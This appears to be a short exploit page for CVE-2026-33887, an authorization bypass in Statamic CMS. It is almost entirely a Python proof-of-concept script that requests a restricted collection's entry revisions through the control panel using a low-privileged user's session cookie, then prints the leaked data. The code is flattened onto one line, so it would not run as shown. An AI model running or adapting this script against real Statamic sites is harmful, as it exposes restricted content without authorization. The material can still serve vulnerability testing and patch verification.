CVE-2026-33887 Statamic权限绕过漏洞

# Proof of Concept: Unauthorized Revision Access # Target: Statamic CMS < 5.73.16 / < 6.7.2 # Description: Accessing revisions of a restricted collection using a low-privileged user. import requests def check_vulnerability(target_url, session_cookie): # Identify a valid entry ID and collection ID (Reconnaissance required) collection_id = "blog" # Example collection entry_id = "1" # Example entry ID # Endpoint to access revisions url = f"{target_url}/cp/collections/{collection_id}/entries/{entry_id}/revisions" headers = { "Cookie": f"statamic_session={session_cookie}", "User-Agent": "CVE-2026-33887-PoC", "Accept": "application/json" } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Vulnerability Confirmed!") print("[+] Successfully accessed unauthorized revisions.") print(f"[+] Response Data: {response.text[:200]}") return True else: print(f"[-] Request failed with status code: {response.status_code}") return False except Exception as e: print(f"[!] Error occurred: {e}") return False # Usage # target = "http://localhost:8000" # cookie = "low_priv_user_session_token" # check_vulnerability(target, cookie)